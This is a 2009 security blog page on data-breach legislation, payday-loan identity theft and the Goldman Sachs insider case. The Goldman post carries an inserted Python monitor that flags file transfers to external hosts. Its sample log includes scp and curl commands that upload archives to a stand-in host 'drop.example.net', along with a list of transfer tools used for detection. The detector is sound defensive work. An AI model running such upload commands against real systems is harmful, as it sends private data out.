Wednesday, July 29, 2009

Is Senator Leahy a Capitalist?

On July 22, 2009 Senator Patrick Leahy (D-VT) introduced the "Personal Data Privacy and Security Act" to combat the growing number of data breaches. As of July 24, 2009 the Privacy Rights Clearinghouse had calculated that 263,214,232 records had been "lost." They are posting new breaches every week, and these are just the ones that are public knowledge.

We applaud Senator Leahy for tackling this important issue as it threatens the trust in the financial systems that we use and have become central to the American way of life.

However, several things in the proposed legislation strike me as protecting the data brokers rather than individuals. First, Section 303, dealing with the "Privacy and Security of Personally Identifiable Information," contains a prohibition against "private action." That protects the data brokers from being sued by the people who have been adversely affected by a data breach. If someone is defrauded out of tens of thousands of dollars because a company lost their records, there is no recourse to sue and try to recover damages and the associated costs of dealing with the identity theft. How does that protect the consumer?

Second, Section 316 gives a breached organization 14 days to report the breach to law enforcement agencies (the Secret Service in this case). That is way too long. In 14 days hundreds of thousands of those records could be resold by hackers and be used in fraudulent transactions. Why not make the notification requirement 24 hours? Better safe than sorry.

More to follow on this legislation as it is a step in the right direction.

Monday, July 13, 2009

Identity Theft Comes to Payday Loans

According to the Chicago Tribune a temporary worker from AT&T, Cassandra Walls, stole information on a number of her co-workers and took out at least 130 loans in their names. Some of the victims found out they had been scammed when collection agencies began calling them.

Let's hope that this identity thief and her co-conspirators are able to compensate all of their victims, even if they have to wait until they get out of prison.

Friday, July 10, 2009

Goldman Sachs Data Breach

Earlier this week the FBI arrested Sergey Aleynikov for the theft of proprietary software from his employer, Goldman Sachs. The complaint is fascinating in providing insight as to what a leading financial institution is doing to protect its intellectual property. Here are some of the items that they had in place (we know there are more controls that were not revealed in the document):
  • Scanned and analyzed outgoing mail
  • Prohibited file transfers using ftp to outside locations
  • Recorded commands performed on the user's desktop
  • Logged access to systems
  • Monitored https traffic

Sergey was a sophisticated insider with technical skills who tried to cover his tracks. Unfortunately for him, the security folks at Goldman Sachs were several steps ahead of him.

The other lessons that we should learn from the affidavit are that:

1) They had a written security policy.
2) They put tools in place to support that policy.
3) They had a security architecture in place to detect when the policy was being violated.
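As an added illustration of that policy-to-tools-to-detection chain (my own example, not code from the post and not anything Goldman Sachs is known to run), here is a small monitor over recorded desktop command lines of the kind the affidavit describes. The policy it enforces is the one in the bullet list above, "no file transfers to outside locations"; the log format, the internal DNS suffix `.corp.example`, the user names and the host `drop.example.net` are all constructed for the example.

```python
"""Flag outbound file transfers that violate a written "no external transfers" policy.

Added example, not from the blog post or from Goldman Sachs. It reads recorded
command lines (one per log entry), picks out file-transfer tools, extracts the
destination host, and raises a finding when the host is not internal.
"""
import re
import shlex
from dataclasses import dataclass
from ipaddress import ip_address

# Hypothetical policy values: the company's internal DNS suffix and the
# transfer tools the policy covers. Private IP ranges also count as internal.
INTERNAL_SUFFIXES = (".corp.example",)
TRANSFER_TOOLS = {"ftp", "sftp", "scp", "rsync", "curl", "wget"}

# Constructed sample log: "<timestamp> <user> <recorded command line>".
SAMPLE_LOG = [
    "2009-06-01T17:02:11 alice scp /tmp/src.tar.gz alice@drop.example.net:/upload/",
    "2009-06-01T17:05:40 alice ftp files.corp.example",
    "2009-06-01T17:08:03 bob curl -T build.zip https://drop.example.net/incoming",
    "2009-06-01T17:09:30 bob ls -la /home/bob",
    "2009-06-01T17:11:00 alice rsync -av ./repo backup.corp.example:/srv/",
    "2009-06-01T17:12:00 alice sftp bob@10.0.5.7",
]


@dataclass(frozen=True)
class Violation:
    timestamp: str
    user: str
    tool: str
    host: str
    command: str


def parse_line(line):
    """Split a log entry into (timestamp, user, command line)."""
    ts, user, cmd = line.split(" ", 2)
    return ts, user, cmd


def is_internal(host):
    """Internal = RFC 1918/private address or a name under the internal suffix."""
    try:
        return ip_address(host).is_private
    except ValueError:
        return host.lower().endswith(INTERNAL_SUFFIXES)


def destination_hosts(tool, args):
    """Extract destination hosts from a transfer tool's arguments.

    ftp/sftp: first positional argument is [user@]host
    scp/rsync: any argument of the form [user@]host:path
    curl/wget: any argument that is a URL
    """
    positional = [a for a in args if not a.startswith("-")]
    hosts = []
    if tool in ("ftp", "sftp"):
        if positional:
            hosts.append(positional[0].split("@")[-1].split(":")[0])
    elif tool in ("scp", "rsync"):
        for a in positional:
            if ":" in a and "://" not in a:
                hosts.append(a.split(":", 1)[0].split("@")[-1])
    elif tool in ("curl", "wget"):
        for a in positional:
            m = re.match(r"^[a-z][a-z0-9+.-]*://(?:[^/@]+@)?([^/:]+)", a)
            if m:
                hosts.append(m.group(1))
    return hosts


def find_violations(lines):
    """Return one Violation per transfer command whose destination is external."""
    findings = []
    for line in lines:
        ts, user, cmd = parse_line(line)
        try:
            argv = shlex.split(cmd)
        except ValueError:
            continue  # unbalanced quotes: malformed entry, skip it
        if not argv or argv[0] not in TRANSFER_TOOLS:
            continue
        for host in destination_hosts(argv[0], argv[1:]):
            if not is_internal(host):
                findings.append(Violation(ts, user, argv[0], host, cmd))
    return findings


if __name__ == "__main__":
    for v in find_violations(SAMPLE_LOG):
        print(f"{v.timestamp} ALERT user={v.user} tool={v.tool} external_host={v.host}")
```

Run against the sample log, it reports the two transfers to `drop.example.net` and stays quiet on the transfers to `files.corp.example`, `backup.corp.example` and `10.0.5.7`. The point is the shape of the thing: the written rule is encoded as data (the suffix list and tool set), the recorded commands are the evidence, and the check that joins them is what turns "we have a policy" into "we notice when it is broken."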

Kudos to the security team at Goldman and the FBI agents who arrested Aleynikov.